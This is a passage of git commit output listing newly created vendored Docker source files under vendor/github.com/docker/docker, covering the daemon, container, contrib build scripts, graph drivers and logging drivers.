100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/metrics.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_windows.go create mode 100644 vendor/github.com/docker/docker/container/archive.go create mode 100644 vendor/github.com/docker/docker/container/container.go create mode 100644 vendor/github.com/docker/docker/container/container_linux.go create mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go create mode 100644 vendor/github.com/docker/docker/container/container_unit_test.go create mode 100644 vendor/github.com/docker/docker/container/container_unix.go create mode 100644 vendor/github.com/docker/docker/container/container_windows.go create mode 100644 vendor/github.com/docker/docker/container/health.go create mode 100644 vendor/github.com/docker/docker/container/history.go create mode 100644 vendor/github.com/docker/docker/container/memory_store.go create mode 100644 vendor/github.com/docker/docker/container/memory_store_test.go create mode 100644 vendor/github.com/docker/docker/container/monitor.go create mode 100644 vendor/github.com/docker/docker/container/mounts_unix.go create mode 100644 vendor/github.com/docker/docker/container/mounts_windows.go create mode 100644 vendor/github.com/docker/docker/container/state.go create mode 100644 vendor/github.com/docker/docker/container/state_solaris.go create mode 100644 vendor/github.com/docker/docker/container/state_test.go create mode 100644 vendor/github.com/docker/docker/container/state_unix.go create mode 100644 vendor/github.com/docker/docker/container/state_windows.go create mode 100644 vendor/github.com/docker/docker/container/store.go create mode 100644 vendor/github.com/docker/docker/container/stream/streams.go create mode 100644 vendor/github.com/docker/docker/contrib/README.md create mode 100644 vendor/github.com/docker/docker/contrib/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/main.go create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/template.go create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/check-config.sh create mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker create mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish create mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/README.md create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/README.md create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go create mode 100755 vendor/github.com/docker/docker/contrib/dockerize-disk.sh create mode 100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh create mode 100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh create mode 100644 vendor/github.com/docker/docker/contrib/editorconfig create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/aliases create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/domain-map create mode 100755 vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/gitdm.config create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/server.go create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.confd create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.initd create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.socket create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/docker.conf create mode 100755 vendor/github.com/docker/docker/contrib/mac-install-bundle.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-alpine.sh create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-arch.sh create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-crux.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-pld.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-yum.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/busybox-static create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/debootstrap create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/rinse create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c create mode 100755 vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh create mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh create mode 100755 vendor/github.com/docker/docker/contrib/report-issue.sh create mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/acct.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/exit32.s create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/ns.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/raw.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setgid.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setuid.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/socket.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/userns.c create mode 100644 vendor/github.com/docker/docker/contrib/udev/80-docker.rules create mode 100644 vendor/github.com/docker/docker/contrib/vagrant-docker/README.md create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default.go create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/archive.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/attach.go create mode 100644 vendor/github.com/docker/docker/daemon/auth.go create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/cache.go create mode 100644 vendor/github.com/docker/docker/daemon/caps/utils_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/changes.go create mode 100644 vendor/github.com/docker/docker/daemon/checkpoint.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/cluster.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/container.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/node.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/secret.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/task.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/backend.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/filters.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/helpers.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/provider/network.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/secrets.go create mode 100644 vendor/github.com/docker/docker/daemon/commit.go create mode 100644 vendor/github.com/docker/docker/daemon/config.go create mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go create mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/config_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/container.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/create.go create mode 100644 vendor/github.com/docker/docker/daemon/create_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/create_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/delete.go create mode 100644 vendor/github.com/docker/docker/daemon/delete_test.go create mode 100644 vendor/github.com/docker/docker/daemon/discovery.go create mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go create mode 100644 vendor/github.com/docker/docker/daemon/disk_usage.go create mode 100644 vendor/github.com/docker/docker/daemon/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/events.go create mode 100644 vendor/github.com/docker/docker/daemon/events/events.go create mode 100644 vendor/github.com/docker/docker/daemon/events/events_test.go create mode 100644 vendor/github.com/docker/docker/daemon/events/filter.go create mode 100644 vendor/github.com/docker/docker/daemon/events/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/events/testutils/testutils.go create mode 100644 vendor/github.com/docker/docker/daemon/events_test.go create mode 100644 vendor/github.com/docker/docker/daemon/exec.go create mode 100644 vendor/github.com/docker/docker/daemon/exec/exec.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/export.go create mode 100644 vendor/github.com/docker/docker/daemon/getsize_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/counter.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/plugin.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/proxy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/health.go create mode 100644 vendor/github.com/docker/docker/daemon/health_test.go create mode 100644 vendor/github.com/docker/docker/daemon/image.go create mode 100644 vendor/github.com/docker/docker/daemon/image_delete.go create mode 100644 vendor/github.com/docker/docker/daemon/image_exporter.go create mode 100644 vendor/github.com/docker/docker/daemon/image_history.go create mode 100644 vendor/github.com/docker/docker/daemon/image_inspect.go create mode 100644 vendor/github.com/docker/docker/daemon/image_pull.go create mode 100644 vendor/github.com/docker/docker/daemon/image_push.go create mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images.go create mode 100644 vendor/github.com/docker/docker/daemon/import.go create mode 100644 vendor/github.com/docker/docker/daemon/info.go create mode 100644 vendor/github.com/docker/docker/daemon/info_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/info_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/keys.go create mode 100644 vendor/github.com/docker/docker/daemon/keys_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/kill.go create mode 100644 vendor/github.com/docker/docker/daemon/links.go create mode 100644 vendor/github.com/docker/docker/daemon/links/links.go create mode 100644 vendor/github.com/docker/docker/daemon/links/links_test.go create mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/links_notlinux.go create mode 100644 vendor/github.com/docker/docker/daemon/list.go create mode 100644 vendor/github.com/docker/docker/daemon/list_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/list_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/context.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/factory.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go create mode 100644 